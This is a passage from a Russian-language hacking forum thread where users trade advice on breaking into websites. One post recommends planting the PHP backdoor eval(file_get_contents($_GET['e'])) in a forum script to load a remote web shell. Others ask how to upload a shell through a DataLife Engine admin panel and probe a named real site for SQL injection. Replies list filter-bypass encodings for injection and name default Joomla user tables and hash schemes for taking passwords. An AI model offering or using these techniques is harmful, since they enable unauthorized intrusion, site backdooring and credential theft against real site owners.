Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    Pavel1987, зачем совать system($_GET["cmd"]); ???
    вставляй eval(file_get_contents($_GET['e']))
    и потом обращайся www.xz.сom/forumpath/faq.php?cmd=http://адресс_до_шела

    почитай ВНИМАТЕЛЬНО тут
     
    #14681 daniel_1024, 29 Aug 2010
    Last edited: 29 Aug 2010
  2. Charle

    Charle Member

    Joined:
    10 Aug 2010
    Messages:
    18
    Likes Received:
    5
    Reputations:
    4
    ахтунг, можно. Через уязвимости ПО, нет, не Веб ПО, а просто ПО, ftp, ssh сплойты и т.п.
     
  3. Pavel1987

    Pavel1987 New Member

    Joined:
    28 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А блин точно) Спасибо большое)) Я думал шелл надо совать в админку в модули, а не заливать куда-то, во я дурак))))
     
  4. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Подскажите как залить шелл через админку DataLife Engine..
    Есть доступ на прикрепление файлов к новостям.
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    прочитай несколько постов назад, был такой умник уже.
     
    1 person likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    а зачем давать детишкам шелл с графикой? если они не могут самым нормальным шелом воспользоватся, в графике они самое умное что сделают так задефейсят сайт ...был дан код который можно вставить в модули, но вариантов куча, если брать по твоему то зачем и eval(file_get_contents($_GET['e'])) когда можно код всего шелла в модули пропихнуть?...
    П.С. Зачем доисторическому человеку давать бензопилу? Ведь он не знает что с топором то делать...
     
    3 people like this.
  7. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start <= now() AND a.date_end >= now() AND a.status = 'active' AND a.adpage = 'blablabla.php?type=2'+group+by+2+--+' AND a.fileid = b.fileID
    [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+2+--+' AND a.fileid = b.fileID' at line 5]

    Подскажите как запрос свой всунуть а то с одной ' он выплевывает это, а если 2 поставить то запрос выполняется. Что в таком случае делать нужно...
    '+group+by+2+--+ это пишу я ) тут плюсы фильтруются или че?:(
     
    #14687 NorB, 29 Aug 2010
    Last edited: 29 Aug 2010
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Попробуй вместо + поставить %20
     
    1 person likes this.
  9. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    имя таблицы от куда вытащил idevaff_admin, пароли хранились sha1
     
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    в джумле по дефолту имя таблицы jos_users, а алгоритм шифрования md5 или md5($pass.$salt) (зависит от версии джумлы)

    выводы делай сам.
     
    _________________________
    #14690 Konqi, 29 Aug 2010
    Last edited: 29 Aug 2010
  11. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    я понимаю но почему то админка на joomla, пароли были sha1. а таблиц который должны быть в joomle там почему то нет!
    ps могу скинут линк в пм сам глянешь, и если не трудно растолкуй потом мне.
     
  12. zeny

    zeny New Member

    Joined:
    7 Jul 2010
    Messages:
    47
    Likes Received:
    0
    Reputations:
    -5
    я новичёк на сайте так что сильно не пинайтею я не знаю куда написать свой вопрос

    скажите как удалить локальный диск!?

    пишите в личку
     
  13. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    куда здесь дальше вписывать +order+by+1-- ?
    http://phonekz.ru/?region=%5C%22&id=1
    http://phonekz.ru/?region=\'&id=1
     
  14. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Там нет SQL Инъекции :)
    Попробуй подставь в конец ссылки ковычку '. Ошибки нет. :)
     
    1 person likes this.
  15. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    ну а это тогда что означает ?
    Code:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 87
    
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 103
     
    #14695 hack-win32, 30 Aug 2010
    Last edited: 30 Aug 2010
  16. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Какая то ошибка в 87 и 103 строке, точно не знаю что.
    Но это точно не иньекция..
     
  17. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    здесь тоже нет ? http://phonekz.ru:80/?region=\"&id=1&city=2133
     
  18. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    все равно фильтрует=\ эт значит уязвимости нету?
     
    1 person likes this.
  19. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Тут тоже нет.
     
    1 person likes this.
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Варианты обхода пробелов:
    /**/,+, %0А, %09, %20, %0d ,%2B, /*tuns*/
    Если ничто не помогло - крути без пробелов, если ничто сделать не сможешь - готов помочь в асе - 4000840.

    Эта ошибка означает, что бд вернула неккоректный результат, чаще всего это инъекции сыпятся с такими ошибками, но это ошибка php, а не mysql. Может быть вывод ошибок mysql просто напросто отключен, но если посыпалась такая ошибка с подставлением ' - то значит в скрипте плохая фильтрация --> может быть инъекция.
     
    #14700 ZARO, 30 Aug 2010
    Last edited: 30 Aug 2010
    2 people like this.
Thread Status:
Not open for further replies.